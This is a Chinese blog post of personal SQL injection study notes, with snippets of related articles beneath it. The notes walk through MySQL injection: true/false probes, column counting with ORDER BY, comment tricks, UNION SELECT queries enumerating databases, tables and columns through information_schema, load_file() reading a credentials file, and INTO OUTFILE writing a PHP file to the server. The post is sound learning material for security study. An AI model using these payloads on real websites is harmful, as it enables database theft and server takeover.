sql注入笔记

最新推荐文章于 2024-07-31 19:38:21 发布
最新推荐文章于 2024-07-31 19:38:21 发布
阅读量280 收藏 1
点赞数 1
分类专栏: 安全 文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39905438/article/details/117920746
版权

sql注入笔记

如何判断注入点
  1. 真假 判断 注入
and 1=1   页面返回正常
and 1=2   页面返回错误
如果  and 1=2  返回正确 那么也可能
a='『id』' 
a='1=and 1=2'
所以应该  1'  and '1'='2  或  1'  order by x --+
干扰符号 ' " % ) }等

2.猜解列名(字段数)

order by x 错误与正常的临界

SELECT * FROM 表名 where order_id="id" order by 2;
当 order by x 错误的时候 说明 只有 x-1 列
  1. 注释

使用#号

有时发现执行的sql语句中没有#号
原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。
所以,HTTP请求中不包括#
将#号改成url的编码%23就可以了

使用–和使用–+

这里发现+号在语句中变成了空格。
用来和后面的单引号分隔开,将后面的语句注释。
了解原理后便知道了–无法使用的原因,是因为–与后面的单引号连接在一起,无法形成有效的mysql语句。
在mysql中使用这个语句分析原因,输入后回车显示分号没有闭合
所以在注入时我们除了使用–+外,也可以使用–'来完成sql注入语句

union select x,x,x,x,x

SELECT add_time,end_time FROM test_12.app_receipt where 1 = -1  union select 1,2; 
-----------------
add_time,end_time|
-----------------|
1       |2       |
-----------------
信息收集
数据库版本 version()
数据库名字  database()
数据库用户  user()
操作系统   @@version_compile_os


information_schema.tables; 记录所有表名的表
information_schema.columns;记录所有列名的表
table_name;表名
table_schema;数据库名字
column_name;列名

mysql5.0 以上版本中,mysql 自带数据库名为 information_schema 它是一个存储所有数据库名 表名 列名

获取数据库名字:
SELECT add_time,end_time FROM test_12.app_receipt where 1 = -1  union select 1,database(); 

获取 数据库下的所有表:

SELECT add_time,end_time FROM test_12.app_receipt where 1 = -1 
union select 1,table_name from information_schema.tables where table_schema="test_12"; 

获取 表下所有的列名
SELECT add_time,end_time FROM test_12.app_receipt where 1 = -1  union select 1, column_name from information_schema.columns where table_name="app_gift";

读取文件 load_file()

SELECT add_time,end_time FROM test_12.app_receipt where 1 = -1  union select 1,load_file('D:\\db-creds.inc');

写入文件 outfile

SELECT add_time,end_time,id FROM test_12.app_receipt where 1 = -1  union select 1,x,3,into outfile 'D:\\....\\x.php --+'; 

--+  为注释后面的语句
该语句 可以在 服务器创建 一个x.php 文件 文件内容为:

反斜杠 单引号 转义 情况

对路径 编码 或者字节处理
print("天涯")
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL注入的原理分类以及防御方式
kkza的博客
11-23 927
原理 程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以构造一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的 SQL Injection,即 SQL 注入。 sql 注入漏洞攻击流程: 注入点探测—信息获取—获取权限注入点探测: 1 单引号 加上单引号,如报错,则可能出现注入点 2 and 判断 判断是字符型还是数字型 A 1 and 1=1 成功 可能存在注入 B 1 and 1=2 成功 说明不是数字型 C 1’and ‘1’= ‘
Web安全SQL注入
Flyz_boy_hss的博客
08-20 177
描述 攻击者把恶意的SQL语句插入到表单数据里并提交,或把恶意的SQL语句插入到网站URL作为参与提交,欺骗服务器执行恶意的SQL语句。 检测 检测软件(jsky); 网站平台(忆思网络安全平台检测工具、MDCSOFT SCAN); 防护 永远不要相信用户的输入,对用户提交的数据进行验证并转义特殊符号保存; 永远不要动态的拼接SQL; 永远不要使用管理员权...
sql注入之盲注(纯原创)
qq_56438857的博客
08-02 347
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。若有查询结果,就证明后面这东西是对的。这里后面是数据库名字的第一个字符的ascii码值。这里区别于前面的是,这里用的是query(),而之前用的execute()。这里之所以用limit限制,是因为源码要求查询结果只能有一条。,之前一直靠的错误回显来窃取关键信息的。...
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 4646
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85869703 1.绕过空格(注释符/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
从零基础认识SQL注入
热门推荐
你不知道你不知道的事
09-30 3万+
SQL注入1.什么是SQL注入 看一下下面的案例场景,这是正常情况下的登陆场景: 而当我们使用 用户名‘:– 的时候,密码随便输入也可以登陆成功↓ 这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且将后半句检索条件注释起来达到免密码登陆效果。 sql注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记 手工注入是指攻击者通过构造特殊的输入来inject恶意的 SQL 代码,使得数据库执行恶意的操作。手工注入常用 SQL 语句笔记对 MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、...
血腥!实况转播SQL注入全过程,让你知道危害有多大。
weixin_30532973的博客
03-31 949
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就实况转播,来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根...
4.0 如何解决SQL注入问题
GabrielCP的博客
05-01 376
** 创建一个用户类,然后模拟用户输入账号密码然后登陆这一操作。 ** public class User { private String user; private String password; public User() { } public User(String user, String password) { super(); this.user = use...
SQL注入
无痕的博客
04-02 416
sql注入原理与防护策略
sql注入
frutrue的博客
10-26 977
简单的sql注入笔记: 一、sql注入 sql注入(sql injection)被称为sql数据库结构化查询,是由于程序员在编写代码时的不严谨所造成的漏洞,它能让外部人员通过sql语句,查询到数据库的重要内容,容易造成数据泄露,隐私文件被读取,财产损失等。 sql注入条件: 1.参数用户可控:前端传给后端的参数用户可控。 2.参数带入数据库查询:传入的参数拼接到SQL语句中,且带入数据库中查询 只要存在着两个条件,就有可能产生sql注入漏洞。现在市面上的数据库类型有Access,mysql,mssql,P
SQL注入的常见方式
LainWith的博客
10-09 7190
目录联合查询(union)函数介绍order byunion select操作布尔盲注 (and or)函数介绍mid 从中间截取字符left 从左开始截取字符ord、ascii 转成ascii码length 统计长度andregexp 正则注入-针对MySQL操作1. 猜数据库长度2. 猜数据库名 (配合BurpSuite)3. 猜表的个数4. 猜表5. 猜列6. 猜值延时注入(sleep if)函数操作1. 猜数据库长度2. 猜数据库名3. 猜表名4. 猜测 users 表的列5. 猜值宽字节注入引子
渗透知识-SQL注入
Jian Sun_的博客
01-26 951
据不完全统计,国内网站ASP+Access或SQLServer占70%以上,PHP+MySQL占20%。 一般asp+access组合比较多,aspx+mssql(SQL Server)组合比较多 一.数据库查询关键词 查询中用到的关键词主要包含六个,并且他们的顺序依次为selcet--from--where--group by--having--order by 其中select和from是必须的,其他关键词是可选的,这六个关键词的执行顺序与sql语句的书写顺序并不是一样的,而是按照下面的顺序来执
深入了解SQL注入绕过waf和过滤机制
kendyhj9999的专栏
06-06 4306
深入了解SQL注入绕过waf和过滤机制 来源:http://drops.wooyun.org/tips/968 16人收藏 收藏 2014/03/02 13:24 | r00tgrok | 技术分享 | 占个座先 知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filte
简单的 mongoDB 学习
qq_19342829的博客
07-31 533
mongodb入门学习整理
社区养老服务小程序的设计
最新发布
Karen198的博客
07-31 603
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
SQL注入漏洞检测与案例分析
本篇SQL注入笔记主要介绍了如何识别和利用SQL注入漏洞在不同数据库系统中的表现。首先,作者提到,当通过URL参数传递的`category`字段在包含特殊字符时,如`'`或`"`,如果页面显示结果没有变化,可能暗示存在注入...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值